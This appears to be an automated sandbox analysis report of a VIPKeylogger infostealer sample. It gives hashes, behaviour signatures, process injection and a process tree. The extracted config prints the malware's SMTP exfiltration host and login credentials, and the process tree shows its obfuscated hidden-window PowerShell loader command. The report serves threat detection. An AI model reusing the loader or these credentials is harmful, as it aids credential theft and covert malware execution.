Analysis
- max time kernel: 143s
- max time network: 146s
- platform: windows10-2004_x64
- resource: win10v2004-20241007-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 22-10-2024 16:08
Static task: static1
Behavioral task: behavioral1
- Sample: Miljpaavirkningen.exe
- Resource: win7-20240903-en
Behavioral task: behavioral2
- Sample: Miljpaavirkningen.exe
- Resource: win10v2004-20241007-en
Behavioral task: behavioral3
- Sample: Kreditnotaens/Plettes.ps1
- Resource: win7-20240729-en
Behavioral task: behavioral4
- Sample: Kreditnotaens/Plettes.ps1
- Resource: win10v2004-20241007-en
General
- Target: Miljpaavirkningen.exe
- Size: 895KB
- MD5: 0327d3ca2373bdcfad29ae18a7554884
- SHA1: 92ce0598c98f0ddc2ae136491f0e988ddcf29d49
- SHA256: eb60de90ee98dcc76c344d75d96f2eb72bd4466a504f2668a660ec928abf07e1
- SHA512: efdd810fab7b956116a99ba2d78e723474e14343c8cd5cde01ae8cb61a441aad14f516a151c530b42b7b8b1760405ca87c9415cbf53a541190c92e2250c751ee
- SSDEEP: 12288:N5e/L/ujA9jjzAmiTs3QCXDzo3vKz/oByv268ODurlKRFP7Pytafm6wY8yujWX6d:abu0wmt43w/9268OD6lm7Pytae6/B1G5
Malware Config
Extracted: vipkeylogger
- Protocol: smtp
- Host: smtp.ionos.es
- Port: 587
- Username: [email protected]
- Password: noVE@2879
- Email To: [email protected]
Signatures
-
VIPKeylogger
VIPKeylogger is a keylogger and infostealer written in C#; it resembles SnakeKeylogger, which was found in 2020.
-
Command and Scripting Interpreter: PowerShell (1 TTPs, 2 IoCs)
Runs PowerShell with the display window hidden.
Processes:
  pid   process
  4684  powershell.exe
  1956  powershell.exe
-
Accesses Microsoft Outlook profiles (1 TTPs, 6 IoCs)
Processes:
  description  ioc  process
  Key opened  \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676  msiexec.exe
  Key opened  \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676  msiexec.exe
  Key opened  \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676  msiexec.exe
  Key opened  \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676  msiexec.exe
  Key opened  \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676  msiexec.exe
  Key opened  \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676  msiexec.exe
-
Blocklisted process makes network request (14 IoCs)
Processes:
  flow  pid   process
  15    2828  msiexec.exe
  17    2008  msiexec.exe
  18    2828  msiexec.exe
  20    2008  msiexec.exe
  22    2828  msiexec.exe
  29    2828  msiexec.exe
  38    2828  msiexec.exe
  47    2008  msiexec.exe
  49    2828  msiexec.exe
  55    2828  msiexec.exe
  57    2008  msiexec.exe
  61    2008  msiexec.exe
  63    2828  msiexec.exe
  65    2008  msiexec.exe
-
Legitimate hosting services abused for malware hosting/C2 (1 TTPs, 3 IoCs)
-
Looks up external IP address via web service (1 IoCs)
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
  flow  ioc
  48    checkip.dyndns.org
-
Suspicious use of NtCreateThreadExHideFromDebugger (2 IoCs)
Processes:
  pid   process
  2828  msiexec.exe
  2008  msiexec.exe
-
Suspicious use of NtSetInformationThreadHideFromDebugger (4 IoCs)
Processes:
  pid   process
  1956  powershell.exe
  4684  powershell.exe
  2828  msiexec.exe
  2008  msiexec.exe
-
Drops file in Windows directory (4 IoCs)
Processes:
  description                   ioc                                       process
  File opened for modification  C:\Windows\resources\Nebengeschfter.ini   Miljpaavirkningen.exe
  File opened for modification  C:\Windows\resources\0409\gildes.lak      Miljpaavirkningen.exe
  File opened for modification  C:\Windows\Fonts\thyrididae.ini           Miljpaavirkningen.exe
  File opened for modification  C:\Windows\resources\0409\diaspidine.Inq  Miljpaavirkningen.exe
-
Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery (1 TTPs, 5 IoCs)
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
  description  ioc                                                          process
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  Miljpaavirkningen.exe
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  powershell.exe
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  powershell.exe
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  msiexec.exe
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  msiexec.exe
-
Suspicious behavior: EnumeratesProcesses (20 IoCs)
Processes:
  pid   process
  1956  powershell.exe
  1956  powershell.exe
  4684  powershell.exe
  4684  powershell.exe
  1956  powershell.exe
  1956  powershell.exe
  1956  powershell.exe
  1956  powershell.exe
  1956  powershell.exe
  1956  powershell.exe
  4684  powershell.exe
  4684  powershell.exe
  1956  powershell.exe
  4684  powershell.exe
  4684  powershell.exe
  4684  powershell.exe
  2828  msiexec.exe
  2008  msiexec.exe
  2828  msiexec.exe
  2008  msiexec.exe
-
Suspicious behavior: MapViewOfSection (2 IoCs)
Processes:
  pid   process
  1956  powershell.exe
  4684  powershell.exe
-
Suspicious use of AdjustPrivilegeToken (46 IoCs)
Processes:
  description                          pid   process
  Token: SeDebugPrivilege              1956  powershell.exe
  Token: SeDebugPrivilege              4684  powershell.exe
  Token: SeIncreaseQuotaPrivilege      1956  powershell.exe
  Token: SeSecurityPrivilege           1956  powershell.exe
  Token: SeTakeOwnershipPrivilege      1956  powershell.exe
  Token: SeLoadDriverPrivilege         1956  powershell.exe
  Token: SeSystemProfilePrivilege      1956  powershell.exe
  Token: SeSystemtimePrivilege         1956  powershell.exe
  Token: SeProfSingleProcessPrivilege  1956  powershell.exe
  Token: SeIncBasePriorityPrivilege    1956  powershell.exe
  Token: SeCreatePagefilePrivilege     1956  powershell.exe
  Token: SeBackupPrivilege             1956  powershell.exe
  Token: SeRestorePrivilege            1956  powershell.exe
  Token: SeShutdownPrivilege           1956  powershell.exe
  Token: SeDebugPrivilege              1956  powershell.exe
  Token: SeSystemEnvironmentPrivilege  1956  powershell.exe
  Token: SeRemoteShutdownPrivilege     1956  powershell.exe
  Token: SeUndockPrivilege             1956  powershell.exe
  Token: SeManageVolumePrivilege       1956  powershell.exe
  Token: 33                            1956  powershell.exe
  Token: 34                            1956  powershell.exe
  Token: 35                            1956  powershell.exe
  Token: 36                            1956  powershell.exe
  Token: SeIncreaseQuotaPrivilege      4684  powershell.exe
  Token: SeSecurityPrivilege           4684  powershell.exe
  Token: SeTakeOwnershipPrivilege      4684  powershell.exe
  Token: SeLoadDriverPrivilege         4684  powershell.exe
  Token: SeSystemProfilePrivilege      4684  powershell.exe
  Token: SeSystemtimePrivilege         4684  powershell.exe
  Token: SeProfSingleProcessPrivilege  4684  powershell.exe
  Token: SeIncBasePriorityPrivilege    4684  powershell.exe
  Token: SeCreatePagefilePrivilege     4684  powershell.exe
  Token: SeBackupPrivilege             4684  powershell.exe
  Token: SeRestorePrivilege            4684  powershell.exe
  Token: SeShutdownPrivilege           4684  powershell.exe
  Token: SeDebugPrivilege              4684  powershell.exe
  Token: SeSystemEnvironmentPrivilege  4684  powershell.exe
  Token: SeRemoteShutdownPrivilege     4684  powershell.exe
  Token: SeUndockPrivilege             4684  powershell.exe
  Token: SeManageVolumePrivilege       4684  powershell.exe
  Token: 33                            4684  powershell.exe
  Token: 34                            4684  powershell.exe
  Token: 35                            4684  powershell.exe
  Token: 36                            4684  powershell.exe
  Token: SeDebugPrivilege              2828  msiexec.exe
  Token: SeDebugPrivilege              2008  msiexec.exe
-
Suspicious use of WriteProcessMemory (14 IoCs)
Processes:
  description                        pid   process                target process
  PID 2900 wrote to memory of 1956   2900  Miljpaavirkningen.exe  powershell.exe
  PID 2900 wrote to memory of 1956   2900  Miljpaavirkningen.exe  powershell.exe
  PID 2900 wrote to memory of 1956   2900  Miljpaavirkningen.exe  powershell.exe
  PID 2900 wrote to memory of 4684   2900  Miljpaavirkningen.exe  powershell.exe
  PID 2900 wrote to memory of 4684   2900  Miljpaavirkningen.exe  powershell.exe
  PID 2900 wrote to memory of 4684   2900  Miljpaavirkningen.exe  powershell.exe
  PID 1956 wrote to memory of 2828   1956  powershell.exe         msiexec.exe
  PID 1956 wrote to memory of 2828   1956  powershell.exe         msiexec.exe
  PID 1956 wrote to memory of 2828   1956  powershell.exe         msiexec.exe
  PID 1956 wrote to memory of 2828   1956  powershell.exe         msiexec.exe
  PID 4684 wrote to memory of 2008   4684  powershell.exe         msiexec.exe
  PID 4684 wrote to memory of 2008   4684  powershell.exe         msiexec.exe
  PID 4684 wrote to memory of 2008   4684  powershell.exe         msiexec.exe
  PID 4684 wrote to memory of 2008   4684  powershell.exe         msiexec.exe
-
outlook_office_path (1 IoCs)
Processes:
  description  ioc  process
  Key opened  \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676  msiexec.exe
-
outlook_win_path (1 IoCs)
Processes:
  description  ioc  process
  Key opened  \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676  msiexec.exe
Processes
(depth 1) C:\Users\Admin\AppData\Local\Temp\Miljpaavirkningen.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\Miljpaavirkningen.exe"
  - Drops file in Windows directory
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID: 2900
  (depth 2) C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Command line: "powershell.exe" -windowstyle hidden "$Rustling=Get-Content -raw 'C:\Users\Admin\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes\Kreditnotaens\Plettes.For';$Wheeping171=$Rustling.SubString(53402,3);.$Wheeping171($Rustling)"
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID: 1956
    (depth 3) C:\Windows\SysWOW64\msiexec.exe
      Command line: "C:\Windows\SysWOW64\msiexec.exe"
      - Accesses Microsoft Outlook profiles
      - Blocklisted process makes network request
      - Suspicious use of NtCreateThreadExHideFromDebugger
      - Suspicious use of NtSetInformationThreadHideFromDebugger
      - System Location Discovery: System Language Discovery
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      PID: 2828
  (depth 2) C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Command line: "powershell.exe" -windowstyle hidden "$Rustling=Get-Content -raw 'C:\Users\Admin\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes\Kreditnotaens\Plettes.For';$Wheeping171=$Rustling.SubString(53402,3);.$Wheeping171($Rustling)"
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID: 4684
    (depth 3) C:\Windows\SysWOW64\msiexec.exe
      Command line: "C:\Windows\SysWOW64\msiexec.exe"
      - Accesses Microsoft Outlook profiles
      - Blocklisted process makes network request
      - Suspicious use of NtCreateThreadExHideFromDebugger
      - Suspicious use of NtSetInformationThreadHideFromDebugger
      - System Location Discovery: System Language Discovery
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - outlook_office_path
      - outlook_win_path
      PID: 2008
MITRE ATT&CK Enterprise v15
Downloads